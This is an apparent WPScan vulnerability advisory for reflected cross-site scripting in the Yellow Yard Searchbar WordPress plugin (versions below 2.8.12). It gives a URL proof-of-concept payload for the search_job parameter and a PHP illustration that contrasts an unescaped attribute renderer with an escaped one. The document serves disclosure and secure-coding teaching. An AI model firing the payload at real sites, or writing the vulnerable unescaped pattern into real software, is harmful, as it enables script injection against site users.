WordPress Plugin Vulnerabilities
Yellow Yard Searchbar < 2.8.12 - Reflected Cross-Site Scripting
Description
The plugin does not escape some URL parameters before outputting them back to the user, leading to Reflected Cross-Site Scripting.
Proof of Concept
On a page where the yy_filter shortcode is embedded, append the following to the URL: /?search_job="><img+src%3Dx+onerror%3Djavascript%3Aalert%28%60HoiWPScan%60%29>
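The unescaped-output pattern behind this class of bug, next to its fix, as an added example that is not the plugin's code and not part of the original advisory. The renderers `render_vulnerable` and `render_hardened` and the helper `element_names` are hypothetical, and the example assumes the `search_job` value is reflected into an input's `value` attribute.

```php
<?php
// Added illustration: hypothetical renderers, NOT the plugin's source.
// Plain PHP (needs ext-dom) so it runs with `php example.php`. In WordPress,
// the output-escaping call for this context is esc_attr().

// Vulnerable pattern: query value concatenated into an attribute unescaped.
function render_vulnerable(array $query): string {
    $term = $query['search_job'] ?? '';
    return '<input type="text" name="search_job" value="' . $term . '">';
}

// Hardened pattern: escape for the attribute context at output time.
function render_hardened(array $query): string {
    $term = $query['search_job'] ?? '';
    if (!is_string($term)) {      // ?search_job[]=x arrives as an array
        $term = '';
    }
    $safe = htmlspecialchars($term, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="search_job" value="' . $safe . '">';
}

// Parse a fragment with an HTML parser and list the element names it contains.
function element_names(string $fragment): array {
    libxml_use_internal_errors(true);   // tolerate sloppy markup quietly
    $doc = new DOMDocument();
    $doc->loadHTML('<div>' . $fragment . '</div>');
    $root = $doc->getElementsByTagName('div')->item(0);
    $names = [];
    foreach ($root->getElementsByTagName('*') as $el) {
        $names[] = $el->nodeName;
    }
    libxml_clear_errors();
    return $names;
}

// The proof-of-concept query string from this advisory, decoded as PHP would.
parse_str('search_job="><img+src%3Dx+onerror%3Djavascript%3Aalert%28%60HoiWPScan%60%29>', $query);

foreach (['render_vulnerable', 'render_hardened'] as $fn) {
    $html = $fn($query);
    // An <img> in the parsed output means the value escaped its attribute.
    $injected = in_array('img', element_names($html), true);
    printf("%-18s injected <img>: %s\n  %s\n", $fn, $injected ? 'yes' : 'no', $html);
}
```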
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Victor Pasman
Submitter
Victor Pasman
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-07-01
Added
2022-07-01
Last Updated
2023-04-12